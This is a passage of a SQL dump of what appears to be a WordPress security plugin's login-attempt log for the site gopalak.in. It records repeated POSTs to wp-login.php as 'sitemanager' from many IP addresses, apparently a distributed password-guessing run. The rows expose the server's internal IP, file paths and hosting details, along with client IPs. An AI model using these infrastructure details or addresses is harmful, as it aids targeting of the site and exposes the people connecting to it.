00:00:00'),(94571,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ru-RU,ru;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"60342\";s:11:\"REMOTE_ADDR\";s:14:\"20.198.224.111\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746026400.37272;s:12:\"REQUEST_TIME\";i:1746026400;}}','20.198.224.111',0,'2025-04-30 20:50:02','1970-01-01 00:00:00'),(94572,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"cs-CZ,cs;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"58154\";s:11:\"REMOTE_ADDR\";s:14:\"162.213.255.50\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746027142.53054;s:12:\"REQUEST_TIME\";i:1746027142;}}','162.213.255.50',0,'2025-04-30 21:02:24','1970-01-01 00:00:00'),(94573,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ar-SA,ar;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, br, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:83:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 13.3; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"42370\";s:11:\"REMOTE_ADDR\";s:13:\"104.249.63.34\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746027510.188298;s:12:\"REQUEST_TIME\";i:1746027510;}}','104.249.63.34',0,'2025-04-30 21:08:31','1970-01-01 00:00:00'),(94574,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ru-RU,ru;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:125:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"46740\";s:11:\"REMOTE_ADDR\";s:14:\"164.90.225.186\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746027874.1349931;s:12:\"REQUEST_TIME\";i:1746027874;}}','164.90.225.186',0,'2025-04-30 21:14:35','1970-01-01 00:00:00'),(94575,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ja-JP,ja;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, br, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"107\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:129.0) Gecko/20100101 Firefox/129.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"37106\";s:11:\"REMOTE_ADDR\";s:15:\"143.110.144.210\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"107\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746028240.7085409;s:12:\"REQUEST_TIME\";i:1746028240;}}','143.110.144.210',0,'2025-04-30 21:20:42','1970-01-01 00:00:00'),(94576,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ar-SA,ar;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:128.0) Gecko/20100101 Firefox/128.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51272\";s:11:\"REMOTE_ADDR\";s:13:\"15.204.43.173\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746028602.2219191;s:12:\"REQUEST_TIME\";i:1746028602;}}','15.204.43.173',0,'2025-04-30 21:26:44','1970-01-01 00:00:00'),(94577,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ar-SA,ar;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, br, deflate\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:119:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14.3) AppleWebKit/614.31.14 (KHTML, like Gecko) Version/17.0.96 Safari/614.31.14\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"58568\";s:11:\"REMOTE_ADDR\";s:11:\"195.7.5.237\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746028966.3698521;s:12:\"REQUEST_TIME\";i:1746028966;}}','195.7.5.237',0,'2025-04-30 21:32:48','1970-01-01 00:00:00'),(94578,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ko-KR,ko;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"58352\";s:11:\"REMOTE_ADDR\";s:13:\"198.27.67.210\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746029331.3275919;s:12:\"REQUEST_TIME\";i:1746029331;}}','198.27.67.210',0,'2025-04-30 21:38:53','1970-01-01 00:00:00'),(94579,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ro-RO,ro;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36 Edg/112.0.1722.68\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"38494\";s:11:\"REMOTE_ADDR\";s:12:\"37.187.26.72\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746029690.9818749;s:12:\"REQUEST_TIME\";i:1746029690;}}','37.187.26.72',0,'2025-04-30 21:44:52','1970-01-01 00:00:00'),(94580,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"vi-VN,vi;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, br, deflate\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51380\";s:11:\"REMOTE_ADDR\";s:12:\"51.75.55.211\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746030046.6841331;s:12:\"REQUEST_TIME\";i:1746030046;}}','51.75.55.211',0,'2025-04-30 21:50:48','1970-01-01 00:00:00'),(94581,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"tr-TR,tr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, br, deflate\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:117:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"37552\";s:11:\"REMOTE_ADDR\";s:14:\"103.186.185.28\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s: